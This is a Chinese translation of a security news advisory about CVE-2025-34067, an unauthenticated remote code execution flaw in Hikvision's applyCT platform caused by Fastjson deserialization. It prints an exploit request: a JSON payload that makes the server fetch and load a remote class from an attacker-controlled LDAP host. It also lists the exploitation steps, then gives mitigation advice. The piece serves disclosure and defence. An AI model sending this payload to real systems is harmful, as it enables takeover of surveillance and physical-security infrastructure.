海康威视 applyCT 爆 CVSS 10.0 级严重漏洞(CVE-2025-34067):Fastjson 反序列化致未授权远程命令执行

阅读量14054

发布时间 : 2025-07-07 15:53:39

x
译文声明

本文是翻译文章,文章原作者 Ddos,文章来源:securityonline

原文地址:https://securityonline.info/critical-hikvision-applyct-flaw-cve-2025-34067-cvss-10-0-unauthenticated-rce-via-fastjson/

译文仅供参考,具体内容表达以及含义原文为准。

近日披露的一项严重漏洞影响了 海康威视广泛部署的安防管理平台 applyCT(即原 HikCentral),该漏洞编号为 CVE-2025-34067,CVSS v4 评分为 满分 10.0,可被攻击者利用实现 未授权远程命令执行(RCE),威胁范围波及大量监控与安全基础设施。

applyCT 是一款集成化安防管理平台,广泛应用于商业、政府、工业等关键场景,用于集中管控和调度安防设备,具备强大的分析能力和可扩展架构,因此在高安全需求的环境中部署率极高。

然而,其 applyCT 组件依赖的 Fastjson 库存在反序列化漏洞,攻击者可通过该漏洞在目标服务器上执行任意代码。漏洞触发点位于系统接口 /bic/ssoService/v1/applyCT 对 JSON 数据的处理逻辑中。“由于使用了存在漏洞的 Fastjson 库版本,applyCT 组件中存在未授权远程命令执行漏洞。”——官方 CVE 描述指出。

攻击原理解析:Fastjson + LDAP 联动触发远程代码执行

 

Fastjson 是一个常用的 Java JSON 解析库,其“autoType”机制允许动态加载类。在未禁用该特性的情况下,攻击者可通过构造恶意 JSON 载荷,引导后端反序列化任意类,从而达到代码执行的目的。

在此次漏洞中,攻击者通过构造特殊的 POST 请求,向目标接口发送 JSON 数据包,利用 JdbcRowSetImpl 类从攻击者控制的 LDAP 服务器加载远程 Java 类,从而在目标系统中执行恶意指令。

POST /bic/ssoService/v1/applyCT 
Content-Type: application/json

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

漏洞利用关键路径

  1. 构造携带恶意“datasource”字段的 JSON 载荷;

  2. 发送 POST 请求至 /bic/ssoService/v1/applyCT 接口;

  3. 服务端反序列化后,连接攻击者控制的 LDAP 服务器;

  4. 触发远程类加载,完成 无认证的远程代码执行(RCE)

高风险影响:不止是网络安全,更是物理安防威胁

 

该漏洞不需要认证过程,可被远程直接利用,尤其当受影响接口暴露在公网时,风险更为严重。鉴于海康平台常用于管理 关键物理安全系统,本次漏洞不仅构成 网络安全问题,更可能带来 实际安防控制风险

 一旦被成功利用,攻击者可能:

  • 劫持监控系统,实时操控摄像头画面;

  • 篡改或关闭安防视频流

  • 横向移动进入企业内部网络

  • 实施进一步的内网攻击与持久控制

应急响应建议:立即排查并升级 Fastjson 组件

 

针对本次高危漏洞,建议受影响组织立即采取以下安全加固措施:

  1. 排查系统是否暴露 /bic/ssoService/v1/applyCT 接口,如非必要应立即关闭外网访问;

  2. 更新 Fastjson 至官方安全版本,或应用海康官方提供的补丁修复方案;

  3. 加强出站 LDAP 通信监控,识别潜在的远程类加载行为;

  4. 对海康 applyCT 或 HikCentral 平台进行全面安全审计,识别潜在横向渗透风险。

本文翻译自securityonline 原文链接。如若转载请注明出处。
分享到:微信
+10赞
收藏
安全客
分享到:微信

发表评论

Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66